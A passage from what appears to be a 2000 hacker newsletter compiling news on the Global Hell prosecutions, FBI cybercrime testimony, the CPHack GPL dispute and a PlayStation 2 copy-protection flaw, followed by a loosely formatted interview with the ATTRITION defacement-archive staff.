“What makes this so scary from a government standpoint is you’ve got a bunch of kids between 16 and 27 and all of a sudden they start getting on conference calls coordinating their attacks on company after company, just like them going down and vandalizing 14 houses on a block in a row,” said Matt Yarbrough, who was the lead federal prosecutor on the case and is now an e-commerce attorney for Vinson & Elkins of Dallas.

‘MostHateD’

Gregory, 19, has agreed to plead guilty to one count of conspiracy to commit telecommunications fraud and computer hacking, according to documents filed in the U.S. District Court of Northern District of Texas.

Gregory, who used the online moniker “MostHateD,” has signed a plea agreement admitting he and other Global Hell members used the Internet to hack into 115 computer systems around the world between January 1997 and May 1999, the court documents say.
He was expected to plead guilty in federal court in Dallas today but the hearing has been postponed, Assistant U.S. Attorney Reid Wittliff said. The plea hearing will likely be rescheduled for sometime in the next few weeks.

He could receive up to five years in prison and $250,000 in fines. He could also be ordered to pay up to $2.5 million in restitution.

“These people would have never come together in one place and been so coordinated if Patrick hadn’t been the driving force behind that,” Yarbrough said. “Essentially, Patrick was the ringleader, the front man and media mind of Global Hell, and the scary force that scared the heck out of companies.”

In an exclusive interview with Brian Ross of ABC’s 20/20 in December, Gregory said the White House and other victims should be thankful for Global Hell because the hackers used their computer genius to spot security loopholes in the computer systems they target.

“If you can get into the high security like that, you’re going to be proud,” Gregory said. “You had the knowledge to do something nobody else in the world could do.”

Hackers Plotted on Net

Gregory admitted, in the plea agreement, to stealing telephone conferencing services from AT&T, MCI, Sprint and Latitude Communications worth tens of thousands of dollars.

He and other members of Global Hell illegally acquired telephone numbers, personal identification numbers and credit card numbers and used them to hold hours of conference calls, during which they would discuss hacking, according to court documents.

The group also discussed their hacking plans on Internet chat rooms, specifically on one called “#creep,” the documents said.

Once they gained unauthorized access to the computer systems, Gregory and the group’s other members placed various codes, files, programs and services on them, the court papers said.
‘Global Hell Will Not Die’

Typically, the hackers defaced the Web pages of the victims’ sites, replacing them with text and graphics relating to “Global Hell.” The U.S. Army’s page, for example, was replaced with the message, “Global Hell is alive. Global Hell will not die.”

The hackers also intentionally deleted data and crashed some of the computer systems, causing hundreds of thousands of dollars in damages in some cases.

“These damages were sometimes financial and sometimes intangible, including the loss of faith in the organizations and ‘brand name’ due to the public defacements of their Web sites,” the plea agreement says.

Authorities say Gregory personally participated in the hacking of at least three Web sites: 1688.com, the American Retirement Corp.’s site, and Blue Byte Software’s site. After hacking into 1688.com, a design firm, on April 27, 1999, he stole banking information and e-mail passwords and posted them on the Internet, court documents say.

Cohorts Convicted

Two other Global Hell members have already been convicted. The Global Hell member who hacked into the White House, 19-year-old Eric Burns of Shoreline, Wash., pleaded guilty in federal court last November and was sentenced to 15 months in prison and ordered by the judge not to touch a computer for three years after that.

Earlier this month, Chad Davis, 20, of Ashwaubenon, Wis., was sentenced to six months in prison for accessing and altering the Army’s Web site. The judge also ordered that Davis pay $8,054 in restitution to the Army for the cost of restoring the Web site; serve three years of supervised release after the six-month prison term; not have contact with anyone from Global Hell; and gain approval from future employers to use the Internet.

“If it’s used wisely, it will carry you over the rainbow,” U.S. District Judge J.P. Stadtmueller said of the Internet.
“But you got yourself involved with something that took you down a very different path, causing a problem for one branch of government.

“This is a deadly serious business. It’s not something that’s a sandbox play tool.”

@HWA

135.0 HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
FBI director Louis Freeh has suggested changes to the law that would help track down cyber criminals and make it easier to keep pace with the fastest-growing area of cyber crime in the United States.

(Whhhaaaaa, my job is too hard, please pass some laws to make it easier.)

C|Net
http://news.cnet.com/news/0-1005-200-1595429.html?dtn.head

----------

FBI cracks down on increasing cybercrimes
By Reuters
Special to CNET News.com
March 28, 2000, 12:40 p.m. PT

WASHINGTON--The number of cybercrimes being investigated by the FBI has doubled in the past year, and last month's attacks on leading Web sites are the tip of the iceberg, FBI director Louis Freeh said today.

Addressing a Senate subcommittee on cybercrime, Freeh suggested changes to the law that would help track down cybercriminals and make it easier to keep pace with the fastest-growing area of crime in the United States.

In 1998, Freeh said, the FBI opened 547 "computer intrusion" cases, and this more than doubled to 1,154 last year. The FBI closed 399 of those cases in 1998 and 912 last year.

"In short, even though we have markedly improved our capabilities to fight cyberintrusions, the problem is growing even faster," he told the committee.

Cyberthreats included disgruntled employees, hackers who "cracked" into networks for the thrill of it or for financial gain, and virus writers. Criminal groups and terrorist organizations also used technology more to raise funds, spread propaganda and communicate with each other.
Freeh declined to give details of the attacks last month on business Web sites such as Yahoo, eBay and Amazon.com, as these are under investigation. But he said the attacks were "the tip of the iceberg" and demonstrated the ease with which such crimes could be committed.

Freeh said U.S. laws have not kept pace with fast-changing technology, adding that the FBI is working with the Justice Department to propose a legislative package to update laws.

Responding to his comments, Democratic Sen. Charles Schumer from New York said laws are set up at a "sub-sonic" speed at a time when the process should be faster than the speed of light.

Freeh said he does not want "extraordinary powers," just enough to deal with the phenomenal changes that have accompanied the Internet.

One problem is that to track down a cybercriminal, court orders often have to be issued in several states.

"There is a needless waste of time and resources, and a number of important investigations are either hampered or derailed entirely in those instances," Freeh said. The use of administrative subpoenas would enable investigators to work more efficiently, he said.

Senators on the committee said some companies are reluctant to report cybercrimes for fear of harming their stock prices.

The president of the Information Technology Association of America, Harris Miller, told the committee that few high-tech firms are interested in being seen by customers as active law enforcement agents.

"No company wants information to surface that they have given in confidence that may jeopardize their market position, strategies, customer base or capital investments," he said.

Asked about the cooperation of foreign governments, Freeh cited the United States' close relationship with Canada. A couple of weeks ago, Freeh said, an FBI office in New Haven picked up an online statement from a youth who said he felt like "shooting up a school."
A 14-year-old in a small Canadian town was tracked down and found to have access to explosives and other weaponry.

Over the New Year's period, Freeh said he had close contact with Far East and Middle Eastern countries and that FBI agents there had been given access to computers and hard drives to investigate threats against Americans.

Freeh said that he visited six areas in the Gulf recently, and all mentioned cybercrime. "The Internet has no boundaries or sovereignty," he said.

Story Copyright © 2000 Reuters Limited. All rights reserved.

@HWA

136.0 HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
In preparation for the upcoming Stop the City protests London police are warning banks to be extra careful screening applicants and to look for people with 'cyber-spy tendencies'. Police fear that anarchist sympathizers may try to infiltrate companies and sabotage computer systems in support of the protests.

The Register UK
http://www.theregister.co.uk/000328-000016.html

----------

Posted 28/03/2000 12:14pm by Linda Harrison

Watch out! There's a Cyberterrorist about

London police are warning banks to look out for cyber terrorists when recruiting staff.

Anarchist sympathisers may try to infiltrate companies and sabotage computer systems to help the anti-City protests expected in May, a senior crime prevention officer said yesterday.

Norman Russell, head of the City of London police community safety branch, said firms should grill new staff for any cyber-spy tendencies.

Job applicants who support the aims of anarchist umbrella group People's Global Action might help demonstrators enter company buildings during the forthcoming Stop the City protests. Alternatively, they could insert viruses in computer files or leak passwords to let hackers penetrate computer systems, the Mail on Sunday reports.
And Russell's advice to spot these saboteurs? "Employers should make sure that they take up references of new employees."

Sound advice. The Register has gone further, and compiled a few suspicious comments to help employers when they are interviewing City slicker applicants.

Anyone letting slip comments like "Bring the Capitalist dogs to their knees!" or "Cream the City fat cats!" should definitely be treated with caution.

As should utterances along the lines of: "The roar of profit and plunder will be replaced by the sounds of rhythms of party and pleasure as a massive carnival of resistance snakes its way through the square mile." (genuine quote - Reclaim the Streets).

But in case these cyber-saboteurs have become more CV-savvy, it may be as well to develop your own techniques to pinpoint a likely candidate. The Register welcomes any tips on how to spot a likely lord or lady of misrule.

Meanwhile, a new nation has emerged to take the cyberwarfare crown. According to Newsbytes, Canada is now a hotbed of cyberterrorism, responsible for 80 per cent of foreign attacks on US computers. FBI director Louis Freeh went so far as to describe this normally law-abiding Mounty nation as a "hacker haven".

Related stories
Anarchists run riot on the Web
City faces up to hack attack

-=-

Fuck i'm sick of seeing "Cyber" in all these lame stories ... - Ed

@HWA

137.0 HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Fredrick
Mattel may not have gotten exactly what it thought when it purchased the copyright to CPHack. CPHack reveals Cyberpatrol's secret list of off-limits web sites as well as methods to circumvent the program. CPHack was released under the GNU Public License which grants the recipient of the software the right to copy, distribute or modify the program. Legal experts say that right can not be revoked.
Wired
http://www.wired.com/news/politics/0,1283,35226,00.html

----------

Mattel Suit Takes GNU Twist
by Declan McCullagh

3:00 a.m. Mar. 28, 2000 PST

BOSTON -- Mattel's claim of victory Monday in a lawsuit over its Cyberpatrol filtering software may be premature.

The toy giant said during a court hearing here that it had acquired intellectual property rights to a program that reveals Cyberpatrol's secret list of off-limits websites and settled the case. Mattel said it planned to use its new copyright in court to ban Internet copying of the "cphack" utility.

But cphack's authors released it under the GNU General Public License, which appears to permit unlimited distribution of the original cphack program, even if Mattel now owns the copyright.

"Once you do that you can't revoke it," said Bennett Haselton of Peacefire, a group opposed to filtering software that temporarily put up its own cphack mirror site.

The Free Software Foundation's GPL agreement says that "the recipient automatically receives a license from the original licensor to copy, distribute or modify the program."

Translation: A copyright holder can't change his mind.

"GPL is software that cannot be revoked," said Eben Moglen, a law professor at Columbia University and FSF general counsel. "Anyone downstream who possesses a copy of the software may redistribute it."

"It's a very amusing case," Moglen said. "If people are going to respond to free software they don't like by trying to wipe it out, they're in for some real trouble."

A spokeswoman for Mattel reached late Monday said she didn't know what the effect of the GPL would be. But she said cphack authors Eddy Jansson and Matthew Skala had signed a contract with Mattel and if there was any deception, "they'd be in big trouble."

The agreement with Jansson gives "all rights, if any" to the cphack source and object code and accompanying essay to Mattel.
The agreement also states that Jansson and Skala attest they "are the sole proprietors of all rights" involved with cphack and have "not assigned" them to anyone else.

Even if Mattel cannot claim exclusive copyright in cphack, it may be able to pursue lawsuits on other grounds.

@HWA

138.0 HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
A U.S. Army Sergeant has been arrested for giving out long distance White House telephone access codes. The codes allowed 9,400 calls worth $50,000 to be placed to locations around the world.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html

----------

See the ISN story.

@HWA

139.0 HNN:Mar 29th:Another DVD Work Around on PlayStation 2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
This time fans have discovered a way to exploit the game console's analog RGB output to copy DVD content to a videotape, circumventing the system's copy-protection technology. The technique is being discussed on Japanese web sites.

(Wonder if this will have any impact on the current MPAA and DeCSS case.)

TechWeb
http://www.techweb.com/wire/story/TWB20000324S0007

----------

Second Backdoor Found In Playstation 2
(03/24/00, 3:44 p.m. ET)
By Yoshiko Hara, EE Times

Video enthusiasts in Japan have found a second backdoor in Sony Computer Entertainment's newly launched Playstation 2. This time, fans have discovered a way to exploit the game console's analog RGB output to illegally copy DVD content to a videotape, circumventing the system's copy-protection technology. The technique is being discussed on Japanese websites.

The discovery of such a flaw is another blow to Sony, already embarrassed earlier this month when users in Japan found a way into Playstation 2 to subvert a geographical code for DVD video disks.
So far, the issue has not raised the ire of movie studios or others in the consumer electronics industry. However, it could accelerate a movement that's quietly forming behind the scenes to develop a new copy protection scheme for the legacy analog RGB interface used both in Playstation 2 and on PCs.

At issue is whether Sony Computer Entertainment has violated a DVD industry agreement that prohibits DVD players from having an analog RGB interface. If so, it's possible that Hollywood studios could take some action against Sony.

But some in the industry pointed out this week that Sony could make the case that Playstation 2 is not a stand-alone DVD player, but a PC. Under the DVD specs, PCs are permitted an RGB output. So far, however, Sony has not resorted to this argument.

Sony Computer Entertainment acknowledged on Wednesday that problems with copy protection can arise from the use of an analog RGB interface, but said the company did nothing wrong and that the RGB interface on the Playstation 2 complies with the DVD specs.

A company spokesman said Sony installed in Playstation 2 appropriate means of preventing any illegal analog-to-analog copying, by providing security coding from Macrovision for all the system's output interface signals: RGB, composite, component, and S-video. For copy protection of analog RGB signals, Sony worked with Macrovision to add Macrovision code in RGB's synchronous signals, the Sony spokesman said.

Further, the game console comes with a cable that outputs widely used composite video signals. An optional cable outputs S-video signals and component signals. In either case, these video signals are protected by Macrovision technology, and taped images are therefore of a substantially lower quality than the originals. That means that nonhackers cannot readily duplicate DVD video content, the spokesman said.
However, anonymous sources have posted on various websites the circuitry diagram and the model name of a converter designed to turn analog RGB signals into NTSC video signals. This converter is also capable of inadvertently removing Macrovision code.

Engineering executives at leading DVD hardware manufacturers, who spoke on the condition of anonymity, expressed frustration with the situation. They said the DVD Copy Control Association (DVD CCA), a licensing agency based in Morgan Hill, Calif., has prohibited outfitting any DVD player with an analog RGB output. The only exception is a Scart connector, a 21-pin connector used in Europe that includes RGB output pins and comes with its own copy protection measure.

"DVD CCA is aware of the reports about this situation and we are looking into it," a spokesman for the association said.

Meanwhile, Sony Computer Entertainment has not given up its plan to deliver better picture quality for displaying DVD images through an RGB output. The company has proposed to the DVD Forum a new cable specification featuring Sony's proprietary 12-pin connector at both ends of the cable. This cable directly conveys analog RGB signal from the Playstation 2 console to a TV set. Sony is currently the only company selling TVs with a 12-pin input.

So far, it is still unclear how the movie industry will respond to the Playstation 2 issue. Studio executives acknowledged this week that protecting against illegal analog-to-analog copying via analog RGB output has been a contentious dilemma for studios and the computer industry. But most studios were hesitant to complain about Playstation 2.

When the DVD standard was first developed several years ago, the consumer electronics, movie, and PC industries all agreed to allow an analog RGB output for PCs, but none for stand-alone DVD players.
According to sources working closely with the DVD Forum's Copy Protection Technical Working Group, the three industries reached that compromise because SVGA was the only legacy link available to connect a PC subsystem with an analog PC monitor. If studios ever wanted to let consumers watch DVD movies on a computer, this was the only pathway. Meanwhile, consumer electronics manufacturers agreed to use composite, component, or S-video -- all protected by using Macrovision technology -- instead of an analog RGB output.

Some observers said the fact that different industries got different treatment from Hollywood could wind up backfiring. Sony Computer Entertainment, in theory, could argue that Playstation 2 is not a stand-alone DVD player, but a computer, experts said. The console doesn't have a DVD decoder chip, but decodes DVD in software. Therefore, it could be argued that Playstation 2 should be permitted an analog RGB output, like any PC on the market, according to this camp.

One Hollywood studio executive, commenting anonymously, said he is not overly concerned with Playstation 2. In his opinion, the picture quality of analog-to-analog copying via analog RGB is too weak to pose a real threat to filmmakers. Others in the movie industry, however, said Sony may have to solve the problem before it introduces the new game console in the United States, where DVD-Video penetration is far more advanced than in Japan.

Also, Hollywood is giving PCs another look as they become capable of receiving HDTV broadcasting. An unprotected analog RGB interface between a computer and a monitor can allow copyrighted material -- particularly high-definition signals -- to traverse "in the clear," with no copy protection, becoming a conduit for mass copying. One studio executive, who spoke on the condition of anonymity, said that new ideas on copy protection for the analog interface are under discussion among PC, consumer electronics, and movie makers.
Companies such as Hitachi, Intel, Matsushita, Sony and Toshiba -- all with a big stake in the issue -- have been working to find a solution, the executive said. He indicated that an answer might emerge in the next few weeks. "Although we have not received any technical information about this [Playstation 2] issue yet, if the content is actually being copied from Playstation 2, we need to discuss [matters] with Sony Computer Entertainment to take effective measures," said a spokesman at Sony Pictures Entertainment, Tokyo.

@HWA

140.0 HNN:Mar 29th:Interview with Attrition Staff Posted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN
http://www.hackernews.com/

contributed by WHiTe VaMPiRe

Project Gamma has recently conducted an interview with the ATTRITION staff. They detail future plans and speak of how they originally started, among other things.

Project Gamma
http://www.projectgamma.com/news/interviews/attrition.shtml

----------

sorry about formatting, figured it best left as is. -Ed

ATTRITION
Date Published: March 27, 2000
Date Conducted: March 25, 2000
Interview Conducted By: WHiTe VaMPiRe
Interview Conducted With: ATTRITION

ATTRITION is a leading computer security Web site with dedicated staff. They are probably best known for their defaced Web site archive, as they were among the first to mirror defaced Web sites and provide them to the public. We came in contact with the ATTRITION staff and asked them about their plans for the future, how they first started, and more. This interview will be left largely unedited due to the nature of the interview and the amount of people involved. This is to make sure that the original intent of their answers is left intact, without distortion of their message. Questions will be colored, answers will be indented.

The ATTRITION staff consists of:
cult_hero aka jericho aka Brian Martin
cOmega - Cancer Omega
modify
punkis
McIntyre
munge

What initially brought about the creation of ATTRITION?

A need for change primarily...
before attrition was sekurity.org sekurity.org had a great concept, but no focus or direction dropping it was a way of dropping the lack of direction and let us move on attrition wanted to be more to the point more honest, more in your face no sugarcoating on our words Definitely in-your-face. no pretty eye candy to obscure information Mostly a meat and potatoes site with little to no window dressing. although people still have trouble reading it heh. BLACK AND RED IS HARD TO READ YO Those come from ppl who don't grok client-side configuration. Who were the initial people involved with the founding of ATTRITION? correct me if i am wrong.. Jericho, Punkis, Modify and myself. Meinel, JP, Winn Schwartau, and Atkinson but i thought it was punkis/comega/me on irc discussing it. modify: die die die die sorry, had to :) cult_hero: yeah, there was a flurry of emails between us, too. maybe mod was there and lurking ;) yes, lots o mail cult_hero: most likely. ;-) in the end, it came down to a list of 10 names attrition made the cut On that note, what made you go with the name ATTRITION (besides the obvious)? let me ask you... what is the obvious? so the CIA -WAS NOT- involved in the founding of Attrition? no, the NSA oh wait ;) FBI i mean. yeah, we're their front or something. Well, the definition, I suppose. As one of you said so appropriately before, "in your face." IIRC, Jer wanted something serious. I would have been happy with a "go-pound-sand-up-your-ass-with-a-mallet.org" domain. attrition literally means "confessing for your sins, but not for the love of god" to me that kind of meant confessing for your sins (read: mistakes) because you had a sense of ethics, honor, morality, duty, etc. not that jer has any of that stuff * punkis snickers When jer brought the name up, it seemed quite appropriate too, given that the state of security these days is largely a war of attrition.
Thinking about it, my definition of ATTRITION in my own mind was changed as I became more familiar with your work. vamp: as well as it should... attrition means a lot of things between a print dictionary, classic literature, dictionary.com etc * cOmega nods. each viewer interprets and uses the site in their own way because of that, we were able to kind of form our own hybrid definition i think How did each of you become involved with ATTRITION? Back in March 1997, I had made a fool of myself with the hacker community. I got involved because I enjoyed working with the system and was willing to pitch in when Jer was quite busy. The NCAA Web site was defaced......to make a long story short it was way too easy to track the kiddie down.... I had never done it before and made a big media whore of myself.... i got involved because i wanted to carry on what i had been doing for five+ years.. with more focus Then I started doing more and more stuff...like crashing jer's place about every other weekend. then was outed for the fool I was :) 2 years later.... I stumbled across some CPM stuff...was floored... I went to Deja.com searched for her news postings....and found a doozie. i got involved by pitching in on some of the scripting jericho was working on.... while comega went to sheep.com Another reason why I got so involved with Attrition was because I work for the US government...and they have NO clue about security. cult_hero: sheep.gov, mo-ron. munge: some? hah, you did 300% more CPM admitting she took LSD in the 70's when it was medically legal for "brain damage"...her words :) haha cult I passed it onto Jer and that, as they say, is the beginning of a beautiful friendship :) I've known Jericho since 94 After a long day at the office, coming home to Attrition was a breath of fresh air...validating in its own perverse way.
he kicked my teeth in and we have been friends since I got involved with attrition because jericho liked my cat What does ATTRITION mean to each of you personally? sometimes i think i could write a book on just that. yup its a love/hate relationship for sure dunno... Attrition to me is not only a clearinghouse of valuable information on security, it also contains a load of information as to the consequences of what happens when people don't take security seriously. biting sarcasm, a sharp wit, and forced attrition of those who think they can get away with it there is just so much involved with it... so much going on public and behind the scenes (nothing too exciting mind you, conspiracy theorists of the world k39383) We're known largely for our mirror, but that's less than 50% of what we're all about. plus its a lot more cO music reviews, sushi reviews, wine reviews The mirror shows the consequences; the rest of the Attrition site shows how one can be proactive about security. punkis: true. and calamari it's about the calamari, dammit Calamari is next to godliness. yes yes it is To be honest I've found good friends at Attrition.. beyond the obvious I have found family there and there is a roy's right by work punkis: oh yes. Sushi King rules... I'd like to plug them errr... not in that way though :) modify: there's a picture I didn't need. Basically, we're all a bunch of sick little monkeys who happen to think alike and we share our various passions in life through this 24-hour megaphone of technology known as attrition.org What do you have planned for ATTRITION's future? personally I want to see a technical focus on attrition attritions future. mostly continuing what we have done and making it better. more access to the information, better stats, better cross ref we have been planning a lot more tech areas *nod* which punkis will be heading up soon i think punkis: agreed; more of a focus on technical papers and all that good stuff.
you can expect to see the return of errata yes Im thinkin of giving up my Attrition account to join the ranks of the Happy Hacker Grey hat slappy foundation... cult_hero: rad. yes, would like to focus more on technical projects Errata, in what sense? the errata section that deals with shoddy journalism on the net and in print www.attrition.org/errata/ modify: w00t it actually was one of our earlier widely recognized pages Ah, right. Negation came to mind as part of that. led to a lot of attention and validation of who we were. God knows there's enough errata out there. errata linked to negation yes The technical projects, what do you have planned in that regard? I would like to see more technical documents and programs released by Attrition and its Staff I have some ideas for some security related tools I want to put together and a couple of real interesting research ideas I'm working on a full PGP guide that will walk users through the command line and gui versions; installation and usage, as well as caveats. I also have a big-ass proposal I'm working on and will be hopefully releasing under the attrition banner. I'm leaving my government job. Are there any common misconceptions behind ATTRITION that you would like to clear up? YES YES 1. we are not a company HELL YES 2. we do not profit from attrition 3. we are not an FBI front 1. We are not a Hacker Gang. 2. We are not LE. 4. mcintyr5e is really a woman 4. we are not affiliated with the FBI, CIA, ISA, NSA, DOD, etc 6. We never worked for FEMA 3. We are NOT "out to get anyone" - we just tell the truth, unpretty as it is. 5. we are not HFG, ULG, GH, or any other kiddy defacer group but, cult, we do meet in giant bunker shaped like a pentagram 4. Punkis is really a man. 6. Yes, we really do have a helicopter 7. Modify is really a cat. 7. Meinel and JP lie 100% of the time 5. We have guns, but we don't have any machine guns. 10. Loop 1 10 goto 1 6.
We are NOT into vampirism or bloodletting (unless there is sex involved) i do not work for KPMG i was not fired from any security job i am not an fbi informant I do work for NASA 11. I need a woman so if any single, attractive women are out there then.... I am leaving NASA for a better job. attrition has fulfilled 2 federal subpoenas in accordance with US Law (I know those fuckwits will lie and say I was 'fired' or some shit.) When did ATTRITION initially start the defaced Web site archive? Actually, defacement mirroring started before attrition. It became "institutionalized" under attrition. comega started it long ago back when it was an uncommon occurrence I was doing it way back in the sek.org days. I mirrored only sites that I thought were entertaining or elegant in some way. Craig Whitmore started it My favorite of all time is "That 0wned Girl". So ATTRITION's mirror was actually a continuation of a project initially started by cOmega? yes In a manner of speaking. Jer took the idea and pumped it full of steroids. yes When I joined up in Feb 1999......I went around to other dead mirrors and asked if we could archive their material 001. comega's mirror of elegant hacks 002. collection of other mirrors 003. start to mirror new sites 004. begin to refine process 005. begin to automate the mirror process 006. revamp the mirror 007. further refine mirror, automation, etc. cult_hero: we got to port the mirror into a db. mSQL or similar 008. begin to take a more active stance in awareness and statistics that is kind of the progression that is a future goal of the mirror DB it, and make it more searchable * cOmega nods. more stats Munge is working on some killer graphical stats pages regarding defacements these will be the kind that make CERT look bad it will put CSI/FBI to shame let me rant a sec one thing we have going for us about the mirror..
is that people report the incidents to us not just the hackers but admins sometimes because of this, we can generate a lot more comprehensive stats than the FBI/CERT does because people see reporting to them as a waste of time their lack of response and action discourages further reporting The FBI only investigates cases involving mondo $$$ or mondo politics. because of this, we hope to take their place in providing realistic statistics regarding computer intrusion One clarification here though everybody and everybody reading this fbi unofficial amount is 5k WE DO NOT HACK THE SITES THAT APPEAR ON THE MIRROR heh thank you mod And our work has one great benefit: we don't do this to pump up our budget or increase revenue (unlike the .com's and .govs) amen we do it because we are passionate about it. so stop accusing us ya lackwits and as we have said, we have all turned down consulting work from the mirror modify: werd to that. and we continue to do so as much as we hate to do it (and admit it), we've lost some great consulting gigs if we did this for indirect money, i think it would somewhat invalidate our purpose and reason Agreed. Oh yes, one more thing. yah, but maybe I should get the arts and crafts store to provide financial backing? Please ask the kiddies to stop asking us 1. how to hack, or 2. how they can break the law in fucking with their ex or stupid shit like that. The next question was, "What is your reasoning behind the defaced Web site archive?" .. but I believe you already answered that. lemme clarify something people like to say that we encourage kids by providing the mirror as punkis always mentions, does this means the news agencies are guilty of encouraging murder? they write about it, live around it, film it, feed it to the masses Like I said earlier, the mirror shows what the consequences are if someone doesn't take security seriously...and website defacements are the LEAST menacing consequence. 
Consider the intruder who alters your data or silently swipes a credit card database (unlike Curador). Now *that* is scary. 1. if we don't do it, someone else will. 2. with us doing it, we think we can do it with a lot of integrity and milk it for valuable info in the form of stats and comparisons So....we might as well do it fully and completely 3. we berate the shit out of the kids reporting these sometimes. we call them lame script kiddies for their actions. 3.5 we do NOT condone their activity any more than shrinks condone the behaviour of their clients no doubt What are your personal feelings on Web site defacements? Lame. I think they are fucking lame stupid such as is tagging There is no elegance in it these days. no purpose same thing Just greets and swearing. 99.9% are a waste of time, talent, and purpose 99.9% require no talent nod any reason to hack amnesty international? At least the "That 0wned Girl" defacement was funny. no At least those done for hacktivism had a reason..... yah, that rooled who reads the mirror archive just to see the defacements anymore? not me. 'nuff said. Some other hacks that I mirrored early on were funny as hell. if we don't mirror them, they will continue to happen tho and when they defaced KKK it was fucking stupid....no message the URLs will be passed around IRC and mail lists I've seen maybe 5-6 good ones since I started last February..... 1999 'Hacktivism' these days is a shroud / justification for lacking actions, quite frequently, from what I have seen. so we mirror them despite their lame message *nod* all the rest are just plain wasteful. hacktivism is a myth its a freakin excuse WHiTe_VaMPiRe: Given what I've seen, hacktivism is a myth. lets face it * cOmega hi5's punkis. Don't fucking hack a site because you can. i think i have found a way to identify hacktivism. no signature. if you are hacking for a reason, there is no need to put a name, group name, or greets.
It's like this: if you have a beef with, say, Big Oil, would you picket a Mom & Pop dime store? those that do so are using it as a justification, not for pure hacktivism That's what these kiddies are doing when they hit 'smalltime.com' and bitch about 'big government'. I hacked it for freedom of speech or freedom of information is a crock of shit too... cOmega...exactly. like the Japanese servers defaced today to rant (in english) about Pakistan/Indian issues If you have a message. Deface a site that has something to do with that message (not that we condone it...) It's like when H4G1S hit NASA HQ. They bitched about commercialization of the Internet. Uhhh...DUH? Then why not hit a .com, ya stupid fucks? if hackers want to have an impact, then they should donate their time and skills to causes they believe in. From what you have seen, what are the common motives for Web site defacement? 1. Because they can WHiTe_VaMPiRe: juvenile angst. motive is because they can yes I agree with mcintyre 2. To make fun of another group/rile them up and because they think 'hacking' is sexy 3. to test their skills "everyone else does, it must be what hacking is about, so i will do it so i can be a hacker" 4. to show off circular logic WHiTe_VaMPiRe: why do young kids go hot rodding? It's a rush and it makes them feel big. defacing a web site != hacking donate time to green peace, something like that. don't deface a corporate website punkis: word. stop at #1 and loop *nod* punkis 5. to get their message out regardless of what site they deface Doing a ./latest-sploit.sh != hacking And the only thing lamer than defacements is DoS'ing. 6. being the first to deface a new country.... 7. being the first to deface a new OS (ie Win2k) yah, and running UNIX exploits against an NT server isn't gonna work... thats TIP #1 defacing a "secure" company hahahha and iishack is not effective against apache haha lol or the morons who tried to hit us with IIS exploits the other night hahah Nice.
I bet it won't be long before someone tries to deface a Palestine site (.ps) when they go live. Remind me to show you my logs at work sometime. Not a lot of brain thrust out there. Do you feel that there is any valid motive for defacing a Web site? good question valid MOTIVE? sure strictly speaking of motives, i think so valid reasoning, I should say.. women only.. just do it for women true hacktivism. david vs goliath (angry consumer vs large corp) its just a shame no valid motives are never demonstrated like Zyklon exactly mod: that is called obsessive stalking i think like I said, KKK was defaced, which I have no problem with, but there was no message whats wrong with that ? I can see doing it as a prank between friends, but as an actual intrusion with intent to damage someone else's property, I couldn't go with that. Minor exceptions would be made for hate groups and/or pedophiles. But that's on principle alone. I think defacements generally denigrate the intent of doing good. especially when these fuckwits are defacing schools that really have no admin/security personnel to speak of they are helpless i could see doing it in a completely oppressive society, with no outlet for free speech, against that oppressive gov't nod like k12 doms WE DO NOT ENDORSE DEFACEMENT OF SITES... WE JUST ARCHIVE!!! message #2 sorry just clearing up FAQ's Do you have any comments on the legal implications of computer crime? WHiTe_VaMPiRe: legal implications? can you be more detailed? explain. The current law enforcement response to say, Web site defacement, and other forms of computer crime that are starting to become more prominent. I personally believe the idea of increasing penalties for hacking is utterly wrong-headed. another book in the making yes cOmega: *agreed* Security is not rocket science. Poor admins are too easy to point fingers..
If the government would focus more on the ounce of prevention rather than the pound of cure, we would have 1/10th of 1% of the number of intrusions we have today. ITS YOUR JOB@!!!! stop surfing porn modify: right on. haha maud As my mother said, it is a knee-jerk reaction you find made by law enforcement to ANY 'new' type of crime well put the media doesn't help matters, either. it puts forth the proposition that these scriptkiddies are 'geniuses' because it's a sexy story. the media is the driving force behind the governments reaction it's not sexy enough to say that the admins are lazy bums and that everyone and their brother who had a clue knew about the vulnerability 2 years ago. What response do you feel would be most appropriate from law enforcement? I expect nothing appropriate from law enforcement. "you were broken into because you are stupid. secure your machines" The legislature is the only branch that can change it. Taking the time to learn the technology they're dealing with Kick every door in until you find the culprit :) rather than working against it LE is just a group of droids who follow orders. i think most web site investigations are a waste of tax payer money like mod said, so your fucking job cult_hero: agreed++ s/so/do Admins need to take more time to look at the security of their network its not freakin hard some of the mail we get from clueless admins really floors me As more laws are being passed as of late, and others trying to be passed, what do you think is the best response? More laws, less laws? What type of laws? What do you feel the overall best response to computer crime and punishment would be? The same laws. The laws are NOT the problem. WHiTe_VaMPiRe: I'll tell you this: out of 2,000 admins at one NASA center, I can count on one hand the number who actually understand how to lock down a server. And people wonder why NASA gets breached so often! Security awareness...
